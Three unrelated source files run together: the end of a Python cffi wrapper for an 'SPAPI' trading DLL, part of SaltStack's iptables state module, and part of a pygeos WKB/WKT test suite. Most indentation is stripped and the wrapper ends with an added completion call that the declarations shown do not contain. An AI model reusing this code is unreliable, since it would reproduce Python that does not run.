int SPAPI_GetPosByProduct(char *user_id, char *prod_code, SPApiPos *pos);
void SPAPI_Uninitialize();
int SPAPI_Logout(char *user_id);
int SPAPI_AccountLogin(char *user_id, char *acc_no);
int SPAPI_AccountLogout(char *user_id, char *acc_no);
int SPAPI_GetTradeCount(char *user_id, char *acc_no);
int SPAPI_SubscribePrice(char *user_id, char *prod_code, int mode);
int SPAPI_SubscribeTicker(char *user_id, char *prod_code, int mode);
int SPAPI_ChangePassword(char *user_id, char *old_password,
char *new_password);
int SPAPI_GetDllVersion(char *dll_ver_no, char *dll_rel_no, char *dll_suffix);
int SPAPI_GetAccBalCount(char* user_id);
int SPAPI_GetAccBalByCurrency(char *user_id, char *ccy, SPApiAccBal *acc_bal);
int SPAPI_GetCcyRateByCcy(char *user_id, char *ccy, double *rate);
int SPAPI_GetAccInfo(char *user_id, SPApiAccInfo *acc_info);
int SPAPI_GetPriceByCode(char *user_id, char *prod_code, SPApiPrice *price);
int SPAPI_SetApiLogPath(char *path);
int SPAPI_LoadProductInfoListByCode(char *inst_code);
int SPAPI_GetProductCount();
int SPAPI_GetProductByCode(char *prod_code, SPApiProduct *prod);
int SPAPI_LoadInstrumentList();
int SPAPI_GetInstrumentCount();
int SPAPI_GetInstrumentByCode(char *inst_code, SPApiInstrument *inst);
int SPAPI_SetLanguageId(int langid);
int SPAPI_SendMarketMakingOrder(char *user_id, SPApiMMOrder *mm_order);
int SPAPI_SubscribeQuoteRequest(char *user_id, char *prod_code, int mode);
int SPAPI_SubscribeAllQuoteRequest(char *user_id, int mode);
int SPAPI_GetAllTradesByArray(char *user_id, char *acc_no,
SPApiTrade* apiTradeList);
int SPAPI_GetOrdersByArray(char *user_id, char *acc_no,
SPApiOrder* apiOrderList);
int SPAPI_GetAllAccBalByArray(char *user_id, SPApiAccBal* apiAccBalList);
int SPAPI_GetInstrumentByArray(SPApiInstrument* apiInstList);
int SPAPI_GetProductByArray(SPApiProduct* apiProdList);
"""
spapi = None
if os.name == "nt":
ffi.cdef(spapi_cdef.replace("SPDLLCALL", "__stdcall"))
ffi.dlopen(os.path.join(dll_location, "libeay32.dll"))
ffi.dlopen(os.path.join(dll_location, "ssleay32.dll"))
spapi = ffi.dlopen(os.path.join(dll_location, "spapidllm64.dll"))
else:
ffi.cdef(spapi_cdef.replace("SPDLLCALL", ""))
ffi.dlopen(os.path.join(dll_location, "libapiwrapper.so"),
ffi.RTLD_GLOBAL | ffi.RTLD_NOW)
spapi = ffi.dlopen(os.path.join(dll_location, "linux-shim.so"))
# Remember to convert unicode strings to byte strings; otherwise ctypes
# will assume the characters are wchars and not ordinary characters.
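# For example (illustrative values), every string crossing the FFI boundary
# is encoded first:
#   spapi.SPAPI_SetApiLogPath("/tmp/splog".encode("utf-8"))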
class SPTrader(object):
ffi = ffi
api = spapi
ffi_conv = cffi_to_py.FfiConverter(ffi)
def __init__(self):
self.api.SPAPI_SetLanguageId(0)
self.api.SPAPI_Initialize()
self.user = None
self.acc_no = None
def ready(self):
if self.user is None:
return -1
else:
return 0
def register_login_reply(self, login_reply_func):
self.api.SPAPI_RegisterLoginReply(login_reply_func)
def register_connecting_reply(self, connected_reply_func):
self.api.SPAPI_RegisterConnectingReply(connected_reply_func)
def register_order_report(self, func):
self.api.SPAPI_RegisterOrderReport(func)
def register_order_request_failed(self, func):
self.api.SPAPI_RegisterOrderRequestFailed(func)
def register_order_before_send_report(self, func):
self.api.SPAPI_RegisterOrderBeforeSendReport(func)
def register_account_login_reply(self, func):
self.api.SPAPI_RegisterAccountLoginReply(func)
def register_account_logout_reply(self, func):
self.api.SPAPI_RegisterAccountLogoutReply(func)
def register_account_info_push(self, account_info_func):
self.api.SPAPI_RegisterAccountInfoPush(account_info_func)
def register_account_position_push(self, func):
self.api.SPAPI_RegisterAccountPositionPush(func)
def register_updated_account_position_push(self, func):
self.api.SPAPI_RegisterUpdatedAccountPositionPush(func)
def register_updated_account_balance_push(self, func):
self.api.SPAPI_RegisterUpdatedAccountBalancePush(func)
def register_trade_report(self, func):
self.api.SPAPI_RegisterTradeReport(func)
def register_price_update(self, func):
self.api.SPAPI_RegisterApiPriceUpdate(func)
def register_ticker_update(self, func):
self.api.SPAPI_RegisterTickerUpdate(func)
def register_psw_change_reply(self, func):
self.api.SPAPI_RegisterPswChangeReply(func)
def register_product_list_by_code_reply(self, func):
self.api.SPAPI_RegisterProductListByCodeReply(func)
def register_instrument_list_reply(self, func):
self.api.SPAPI_RegisterInstrumentListReply(func)
def register_business_date_reply(self, func):
self.api.SPAPI_RegisterBusinessDateReply(func)
def register_mm_order_request_failed(self, func):
self.api.SPAPI_RegisterMMOrderRequestFailed(func)
def register_mm_order_before_send_report(self, func):
self.api.SPAPI_RegisterMMOrderBeforeSendReport(func)
def register_quote_request_received_report(self, func):
self.api.SPAPI_RegisterQuoteRequestReceivedReport(func)
def load_instrument_list(self):
return self.api.SPAPI_LoadInstrumentList()
def set_login_info(self,
host,
port,
license,
app_id,
user_id,
password):
self.user = user_id.encode("utf-8")
self.acc_no = self.user
self.api.SPAPI_SetLoginInfo(host.encode("utf-8"),
port,
license.encode("utf-8"),
app_id.encode("utf-8"),
self.user,
password.encode("utf-8"))
def login(self):
return self.api.SPAPI_Login()
def get_login_status(self, status_id):
if self.user is None:
return -1
return self.api.SPAPI_GetLoginStatus(self.user, status_id)
def get_instrument_count(self):
return self.api.SPAPI_GetInstrumentCount()
def get_instrument(self):
count = self.get_instrument_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiInstrument[%d]" % (count))
if self.api.SPAPI_GetInstrumentByArray(buffer) == 0:
return self.cdata_to_py(buffer)
else:
return []
    def get_product_count(self):
        return self.api.SPAPI_GetProductCount()
def get_product(self):
count = self.get_product_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiProduct[%d]" % (count))
        if self.api.SPAPI_GetProductByArray(buffer) == 0:
            return self.cdata_to_py(buffer)
        return []
def get_acc_info(self):
if self.user is None:
return None
buffer = self.ffi.new("SPApiAccInfo[1]")
self.api.SPAPI_GetAccInfo(self.user, buffer)
return self.cdata_to_py(buffer[0])
def get_acc_bal_count(self):
return self.api.SPAPI_GetAccBalCount(self.user)
def get_order_count(self):
return self.api.SPAPI_GetOrderCount(self.user, self.acc_no)
def get_all_orders(self):
if self.ready() != 0:
return []
count = self.get_order_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiOrder[%d]" % (count))
if self.api.SPAPI_GetOrdersByArray(self.user,
self.acc_no,
buffer) != 0:
return []
return self.cdata_to_py(buffer)
def get_trade_count(self):
return self.api.SPAPI_GetTradeCount(self.user, self.acc_no)
def get_all_trades(self):
if self.ready() != 0:
return []
count = self.get_trade_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiTrade[%d]" % (count))
if self.api.SPAPI_GetAllTradesByArray(self.user,
self.acc_no,
buffer) != 0:
return []
return self.cdata_to_py(buffer)
def get_position_count(self):
        return self.api.SPAPI_GetPosCount(self.user)
def get_price_by_code(self, code):
price = self.ffi.new("SPApiPrice[1]")
self.api.SPAPI_GetPriceByCode(self.user, code.encode("utf-8"), price)
return self.cdata_to_py(price)
def subscribe_price(self, prod, value):
self.api.SPAPI_SubscribePrice(self.user,
prod.encode("utf-8"), value)
def subscribe_ticker(self, prod, value):
self.api.SPAPI_SubscribeTicker(self.user,
prod.encode("utf-8"), value)
def logout(self):
user = self.user
if user is not None:
self.user = None
self.acc_no = None
return self.api.SPAPI_Logout(user)
def cdata_to_py(self, s):
return self.ffi_conv.to_py(s)
def fields(self, s):
return self.ffi_conv.fields(s)
def order_add(self, data):
data['AccNo'] = self.acc_no
data['Initiator'] = self.user
buffer = self.ffi.new("SPApiOrder[1]")
self.ffi_conv.from_py(buffer, data)
if buffer is None:
            return -1
        # (Completing the truncated source: submit the populated order
        # struct via SPAPI_AddOrder, declared in the cdef above.)
        return self.api.SPAPI_AddOrder(buffer)
<reponame>elblivion/salt<filename>salt/states/iptables.py
# -*- coding: utf-8 -*-
'''
Management of iptables
======================
This is an iptables-specific module designed to manage Linux firewalls. It is
expected that this state module, and other system-specific firewall states, may
at some point be deprecated in favor of a more generic `firewall` state.
.. code-block:: yaml
httpd:
iptables.append:
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.append:
- table: filter
- chain: INPUT
- jump: ACCEPT
- match:
- state
- comment
- comment: "Allow HTTP"
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.append:
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.insert:
- position: 1
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.insert:
- position: 1
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- position: 1
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
'''
# Import salt libs
from salt.state import STATE_INTERNAL_KEYWORDS as _STATE_INTERNAL_KEYWORDS
def __virtual__():
'''
    Only load if the iptables module is available in __salt__
'''
return 'iptables.version' in __salt__
def chain_present(name, table='filter', family='ipv4'):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
    Verify the chain exists.
name
A user-defined chain name.
table
The table to own the chain.
family
Networking family, either ipv4 or ipv6
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
chain_check = __salt__['iptables.check_chain'](table, name, family)
if chain_check is True:
ret['result'] = True
        ret['comment'] = ('iptables {0} chain already exists in {1} table for {2}'
.format(name, table, family))
return ret
if __opts__['test']:
ret['comment'] = 'iptables {0} chain in {1} table needs to be set for {2}'.format(
name,
table,
family)
return ret
command = __salt__['iptables.new_chain'](table, name, family)
if command is True:
ret['changes'] = {'locale': name}
ret['result'] = True
        ret['comment'] = ('iptables {0} chain in {1} table created successfully for {2}'
.format(name, table, family))
return ret
else:
ret['result'] = False
ret['comment'] = 'Failed to create {0} chain in {1} table: {2} for {3}'.format(
name,
table,
command.strip(),
family
)
return ret
def chain_absent(name, table='filter', family='ipv4'):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Verify the chain is absent.
family
Networking family, either ipv4 or ipv6
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
chain_check = __salt__['iptables.check_chain'](table, name, family)
if not chain_check:
ret['result'] = True
ret['comment'] = ('iptables {0} chain is already absent in {1} table for {2}'
.format(name, table, family))
return ret
if __opts__['test']:
        ret['comment'] = 'iptables {0} chain in {1} table needs to be removed for {2}'.format(
name,
table,
family)
return ret
flush_chain = __salt__['iptables.flush'](table, name, family)
if not flush_chain:
command = __salt__['iptables.delete_chain'](table, name, family)
if command is True:
ret['changes'] = {'locale': name}
ret['result'] = True
            ret['comment'] = ('iptables {0} chain in {1} table deleted successfully for {2}'
.format(name, table, family))
else:
ret['result'] = False
ret['comment'] = ('Failed to delete {0} chain in {1} table: {2} for {3}'
.format(name, table, command.strip(), family))
else:
ret['result'] = False
ret['comment'] = 'Failed to flush {0} chain in {1} table: {2} for {3}'.format(
name,
table,
flush_chain.strip(),
family
)
return ret
def append(name, family='ipv4', **kwargs):
'''
.. versionadded:: 0.17.0
Append a rule to a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Network family, ipv4 or ipv6.
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full='True', family=family, command='A', **kwargs)
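    # `rule` is the match/target portion used for the existence check below;
    # `command` is the full invocation (built with command='A') used only in
    # the user-facing comment strings.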
if __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already set ({1}) for {2}'.format(
name,
command.strip(),
family)
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be set ({1}) for {2}'.format(
name,
command.strip(),
family)
return ret
if __salt__['iptables.append'](kwargs['table'], kwargs['chain'], rule, family):
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = 'Set iptables rule for {0} to: {1} for {2}'.format(
name,
command.strip(),
family)
if 'save' in kwargs:
if kwargs['save']:
__salt__['iptables.save'](filename=None, family=family)
ret['comment'] = ('Set and Saved iptables rule for {0} to: '
'{1} for {2}'.format(name, command.strip(), family))
return ret
else:
ret['result'] = False
ret['comment'] = ('Failed to set iptables rule for {0}.\n'
'Attempted rule was {1} for {2}').format(
name,
command.strip(), family)
return ret
def insert(name, family='ipv4', **kwargs):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
Insert a rule into a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Networking family, either ipv4 or ipv6
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full=True, family=family, command='I', **kwargs)
if __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already set for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be set for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if not __salt__['iptables.insert'](kwargs['table'], kwargs['chain'], kwargs['position'], rule, family):
ret['changes'] = {'locale': name}
ret['result'] = True
ret['comment'] = 'Set iptables rule for {0} to: {1} for {2}'.format(
name,
command.strip(),
family)
if 'save' in kwargs:
if kwargs['save']:
__salt__['iptables.save'](filename=None, family=family)
ret['comment'] = ('Set and Saved iptables rule for {0} to: '
'{1} for {2}').format(name, command.strip(), family)
return ret
else:
ret['result'] = False
ret['comment'] = ('Failed to set iptables rule for {0}.\n'
'Attempted rule was {1}').format(
name,
command.strip())
return ret
def delete(name, family='ipv4', **kwargs):
'''
.. versionadded:: 2014.1.0 (Hydrogen)
    Delete a rule from a chain
name
A user-defined name to call this rule by in another part of a state or
formula. This should not be an actual rule.
family
Networking family, either ipv4 or ipv6
All other arguments are passed in with the same name as the long option
that would normally be used for iptables, with one exception: `--state` is
specified as `connstate` instead of `state` (not to be confused with
`ctstate`).
'''
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
for ignore in _STATE_INTERNAL_KEYWORDS:
if ignore in kwargs:
del kwargs[ignore]
rule = __salt__['iptables.build_rule'](family=family, **kwargs)
command = __salt__['iptables.build_rule'](full=True, family=family, command='D', **kwargs)
if not __salt__['iptables.check'](kwargs['table'],
kwargs['chain'],
rule,
family) is True:
ret['result'] = True
ret['comment'] = 'iptables rule for {0} already absent for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if __opts__['test']:
ret['comment'] = 'iptables rule for {0} needs to be deleted for {1} ({2})'.format(
name,
family,
command.strip())
return ret
if 'position' in kwargs:
result = __salt__['iptables.delete'](
kwargs['table'],
kwargs['chain'],
family=family,
position=kwargs['position'])
import pickle
import struct
from unittest import mock
import numpy as np
import pytest
import pygeos
from .common import all_types, empty_point, point, point_z
# fmt: off
POINT11_WKB = b"\x01\x01\x00\x00\x00" + struct.pack("<2d", 1.0, 1.0)
NAN = struct.pack("<d", float("nan"))
POINT_NAN_WKB = b'\x01\x01\x00\x00\x00' + (NAN * 2)
POINTZ_NAN_WKB = b'\x01\x01\x00\x00\x80' + (NAN * 3)
MULTIPOINT_NAN_WKB = b'\x01\x04\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
MULTIPOINTZ_NAN_WKB = b'\x01\x04\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
GEOMETRYCOLLECTION_NAN_WKB = b'\x01\x07\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
GEOMETRYCOLLECTIONZ_NAN_WKB = b'\x01\x07\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
NESTED_COLLECTION_NAN_WKB = b'\x01\x07\x00\x00\x00\x01\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x01\x01\x00\x00\x00' + (NAN * 2)
NESTED_COLLECTIONZ_NAN_WKB = b'\x01\x07\x00\x00\x80\x01\x00\x00\x00\x01\x04\x00\x00\x80\x01\x00\x00\x00\x01\x01\x00\x00\x80' + (NAN * 3)
# fmt: on
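# For reference, the WKB layout shared by the constants above: byte 0 is the
# byte order (b"\x01" = little-endian), bytes 1-4 are the geometry type as a
# uint32 (1 = Point, 4 = MultiPoint, 7 = GeometryCollection), where the high
# bit (0x80000000, hence the trailing b"\x80") flags a Z dimension; the
# coordinates follow as little-endian doubles.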
class ShapelyGeometryMock:
def __init__(self, g):
self.g = g
self.__geom__ = g._ptr if hasattr(g, "_ptr") else g
@property
def __array_interface__(self):
# this should not be called
# (starting with numpy 1.20 it is called, but not used)
return np.array([1.0, 2.0]).__array_interface__
@property
def wkb(self):
return pygeos.to_wkb(self.g)
@property
def geom_type(self):
idx = pygeos.get_type_id(self.g)
return [
"None",
"Point",
"LineString",
"LinearRing",
"Polygon",
"MultiPoint",
"MultiLineString",
"MultiPolygon",
"GeometryCollection",
][idx]
@property
def is_empty(self):
return pygeos.is_empty(self.g)
class ShapelyPreparedMock:
def __init__(self, g):
self.context = ShapelyGeometryMock(g)
def shapely_wkb_loads_mock(wkb):
geom = pygeos.from_wkb(wkb)
return ShapelyGeometryMock(geom)
def test_from_wkt():
expected = pygeos.points(1, 1)
actual = pygeos.from_wkt("POINT (1 1)")
assert pygeos.equals(actual, expected)
# also accept bytes
actual = pygeos.from_wkt(b"POINT (1 1)")
assert pygeos.equals(actual, expected)
def test_from_wkt_none():
# None propagates
assert pygeos.from_wkt(None) is None
def test_from_wkt_exceptions():
with pytest.raises(TypeError, match="Expected bytes, got int"):
pygeos.from_wkt(1)
with pytest.raises(
pygeos.GEOSException, match="Expected word but encountered end of stream"
):
pygeos.from_wkt("")
with pytest.raises(pygeos.GEOSException, match="Unknown type: 'NOT'"):
pygeos.from_wkt("NOT A WKT STRING")
def test_from_wkt_warn_on_invalid():
with pytest.warns(Warning, match="Invalid WKT"):
pygeos.from_wkt("", on_invalid="warn")
with pytest.warns(Warning, match="Invalid WKT"):
pygeos.from_wkt("NOT A WKT STRING", on_invalid="warn")
def test_from_wkt_ignore_on_invalid():
with pytest.warns(None):
pygeos.from_wkt("", on_invalid="ignore")
with pytest.warns(None):
pygeos.from_wkt("NOT A WKT STRING", on_invalid="ignore")
def test_from_wkt_on_invalid_unsupported_option():
with pytest.raises(ValueError, match="not a valid option"):
pygeos.from_wkt(b"\x01\x01\x00\x00\x00\x00", on_invalid="unsupported_option")
@pytest.mark.parametrize("geom", all_types)
def test_from_wkt_all_types(geom):
wkt = pygeos.to_wkt(geom)
actual = pygeos.from_wkt(wkt)
assert pygeos.equals(actual, geom)
@pytest.mark.parametrize(
"wkt",
("POINT EMPTY", "LINESTRING EMPTY", "POLYGON EMPTY", "GEOMETRYCOLLECTION EMPTY"),
)
def test_from_wkt_empty(wkt):
geom = pygeos.from_wkt(wkt)
assert pygeos.is_geometry(geom).all()
assert pygeos.is_empty(geom).all()
assert pygeos.to_wkt(geom) == wkt
def test_from_wkb():
expected = pygeos.points(1, 1)
actual = pygeos.from_wkb(POINT11_WKB)
assert pygeos.equals(actual, expected)
def test_from_wkb_hex():
# HEX form
expected = pygeos.points(1, 1)
actual = pygeos.from_wkb("0101000000000000000000F03F000000000000F03F")
assert pygeos.equals(actual, expected)
actual = pygeos.from_wkb(b"0101000000000000000000F03F000000000000F03F")
assert pygeos.equals(actual, expected)
def test_from_wkb_none():
# None propagates
assert pygeos.from_wkb(None) is None
def test_from_wkb_exceptions():
with pytest.raises(TypeError, match="Expected bytes, got int"):
pygeos.from_wkb(1)
# invalid WKB
with pytest.raises(pygeos.GEOSException, match="Unexpected EOF parsing WKB"):
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00")
assert result is None
# invalid ring in WKB
with pytest.raises(
pygeos.GEOSException,
match="Invalid number of points in LinearRing found 3 - must be 0 or >= 4",
):
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A"
)
assert result is None
def test_from_wkb_warn_on_invalid_warn():
# invalid WKB
with pytest.warns(Warning, match="Invalid WKB"):
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="warn")
assert result is None
# invalid ring in WKB
with pytest.warns(Warning, match="Invalid WKB"):
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A",
on_invalid="warn",
)
assert result is None
def test_from_wkb_ignore_on_invalid_ignore():
# invalid WKB
with pytest.warns(None) as w:
result = pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="ignore")
assert result is None
assert len(w) == 0 # no warning
# invalid ring in WKB
with pytest.warns(None) as w:
result = pygeos.from_wkb(
b"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00P}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A0n\xa3!\xfc\xb05A\xa0\x11\xa5=\x90^=AP}\xae\xc6\x00\xb15A\x00\xde\x02I\x8e^=A",
on_invalid="ignore",
)
assert result is None
assert len(w) == 0 # no warning
def test_from_wkb_on_invalid_unsupported_option():
with pytest.raises(ValueError, match="not a valid option"):
pygeos.from_wkb(b"\x01\x01\x00\x00\x00\x00", on_invalid="unsupported_option")
@pytest.mark.parametrize("geom", all_types)
@pytest.mark.parametrize("use_hex", [False, True])
@pytest.mark.parametrize("byte_order", [0, 1])
def test_from_wkb_all_types(geom, use_hex, byte_order):
wkb = pygeos.to_wkb(geom, hex=use_hex, byte_order=byte_order)
actual = pygeos.from_wkb(wkb)
assert pygeos.equals(actual, geom)
@pytest.mark.parametrize(
"wkt",
("POINT EMPTY", "LINESTRING EMPTY", "POLYGON EMPTY", "GEOMETRYCOLLECTION EMPTY"),
)
def test_from_wkb_empty(wkt):
wkb = pygeos.to_wkb(pygeos.Geometry(wkt))
geom = pygeos.from_wkb(wkb)
assert pygeos.is_geometry(geom).all()
assert pygeos.is_empty(geom).all()
assert pygeos.to_wkb(geom) == wkb
def test_to_wkt():
point = pygeos.points(1, 1)
actual = pygeos.to_wkt(point)
assert actual == "POINT (1 1)"
actual = pygeos.to_wkt(point, trim=False)
assert actual == "POINT (1.000000 1.000000)"
actual = pygeos.to_wkt(point, rounding_precision=3, trim=False)
assert actual == "POINT (1.000 1.000)"
def test_to_wkt_3D():
# 3D points
point_z = pygeos.points(1, 1, 1)
actual = pygeos.to_wkt(point_z)
assert actual == "POINT Z (1 1 1)"
actual = pygeos.to_wkt(point_z, output_dimension=3)
assert actual == "POINT Z (1 1 1)"
actual = pygeos.to_wkt(point_z, output_dimension=2)
assert actual == "POINT (1 1)"
actual = pygeos.to_wkt(point_z, old_3d=True)
assert actual == "POINT (1 1 1)"
def test_to_wkt_none():
# None propagates
assert pygeos.to_wkt(None) is None
def test_to_wkt_exceptions():
with pytest.raises(TypeError):
pygeos.to_wkt(1)
with pytest.raises(pygeos.GEOSException):
pygeos.to_wkt(point, output_dimension=4)
def test_to_wkt_point_empty():
assert pygeos.to_wkt(empty_point) == "POINT EMPTY"
def test_to_wkt_geometrycollection_with_point_empty():
collection = pygeos.geometrycollections([empty_point, point])
# do not check the full value as some GEOS versions give
# GEOMETRYCOLLECTION Z (...) and others give GEOMETRYCOLLECTION (...)
assert pygeos.to_wkt(collection).endswith("(POINT EMPTY, POINT (2 3))")
def test_to_wkt_multipoint_with_point_empty_errors():
# Test if segfault is prevented
geom = pygeos.multipoints([empty_point, point])
with pytest.raises(ValueError):
pygeos.to_wkt(geom)
def test_repr():
assert repr(point) == "<pygeos.Geometry POINT (2 3)>"
def test_repr_max_length():
# the repr is limited to 80 characters
geom = pygeos.linestrings(np.arange(1000), np.arange(1000))
representation = repr(geom)
assert len(representation) == 80
assert representation.endswith("...>")
def test_repr_multipoint_with_point_empty():
# Test if segfault is prevented
geom = pygeos.multipoints([point, empty_point])
assert repr(geom) == "<pygeos.Geometry Exception in WKT writer>"
def test_to_wkb():
point = pygeos.points(1, 1)
actual = pygeos.to_wkb(point, byte_order=1)
assert actual == POINT11_WKB
def test_to_wkb_hex():
point = pygeos.points(1, 1)
actual = pygeos.to_wkb(point, hex=True, byte_order=1)
le = "01"
point_type = "01000000"
coord = "000000000000F03F" # 1.0 as double (LE)
assert actual == le + point_type + 2 * coord
def test_to_wkb_3D():
point_z = pygeos.points(1, 1, 1)
actual = pygeos.to_wkb(point_z, byte_order=1)
# fmt: off
assert actual == b"\x01\x01\x00\x00\x80\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\xf0?" # noqa
# fmt: on
actual = pygeos.to_wkb(point_z, output_dimension=2, byte_order=1)
assert actual == POINT11_WKB
def test_to_wkb_none():
# None propagates
assert pygeos.to_wkb(None) is None
def test_to_wkb_exceptions():
with pytest.raises(TypeError):
pygeos.to_wkb(1)
with pytest.raises(pygeos.GEOSException):
pygeos.to_wkb(point, output_dimension=4)
def test_to_wkb_byte_order():
point = pygeos.points(1.0, 1.0)
be = b"\x00"
le = b"\x01"
point_type = b"\x01\x00\x00\x00" # 1 as 32-bit uint (LE)
coord = b"\x00\x00\x00\x00\x00\x00\xf0?" # 1.0 as double (LE)
assert pygeos.to_wkb(point, byte_order=1) == le + point_type + 2 * coord
assert pygeos.to_wkb(point, byte_order=0) == be + point_type[::-1] + 2 * coord[::-1]
def test_to_wkb_srid():
# hex representation of POINT (0 0) with SRID=4
ewkb = "01010000200400000000000000000000000000000000000000"
wkb = "010100000000000000000000000000000000000000"
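    # The two differ only in the type word: the EWKB form carries the
    # 0x20000000 "SRID present" flag (the "20" byte above), followed by the
    # SRID as a little-endian uint32 ("04000000" = 4).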
actual = pygeos.from_wkb(ewkb)
assert pygeos.to_wkt(actual, trim=True) == "POINT (0 0)"
assert pygeos.to_wkb(actual, hex=True, byte_order=1) == wkb
assert pygeos.to_wkb(actual, hex=True, include_srid=True, byte_order=1) == ewkb
point = pygeos.points(1, 1)
point_with_srid = pygeos.set_srid(point, np.int32(4326))
result = pygeos.to_wkb(point_with_srid, include_srid=True, byte_order=1)
assert np.frombuffer(result[5:9], "<u4").item() == 4326
@pytest.mark.skipif(
pygeos.geos_version >= (3, 8, 0), reason="Pre GEOS 3.8.0 has 3D empty points"
)
@pytest.mark.parametrize(
"geom,dims,expected",
[
(empty_point, 2, POINT_NAN_WKB),
(empty_point, 3, POINTZ_NAN_WKB),
(pygeos.multipoints([empty_point]), 2, MULTIPOINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 3, MULTIPOINTZ_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 2, GEOMETRYCOLLECTION_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 3, GEOMETRYCOLLECTIONZ_NAN_WKB),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
2,
NESTED_COLLECTION_NAN_WKB,
),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
3,
NESTED_COLLECTIONZ_NAN_WKB,
),
],
)
def test_to_wkb_point_empty_pre_geos38(geom, dims, expected):
actual = pygeos.to_wkb(geom, output_dimension=dims, byte_order=1)
# Use numpy.isnan; there are many byte representations for NaN
assert actual[: -dims * 8] == expected[: -dims * 8]
assert np.isnan(struct.unpack("<{}d".format(dims), actual[-dims * 8 :])).all()
@pytest.mark.skipif(
pygeos.geos_version < (3, 8, 0), reason="Post GEOS 3.8.0 has 2D empty points"
)
@pytest.mark.parametrize(
"geom,dims,expected",
[
(empty_point, 2, POINT_NAN_WKB),
(empty_point, 3, POINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 2, MULTIPOINT_NAN_WKB),
(pygeos.multipoints([empty_point]), 3, MULTIPOINT_NAN_WKB),
(pygeos.geometrycollections([empty_point]), 2, GEOMETRYCOLLECTION_NAN_WKB),
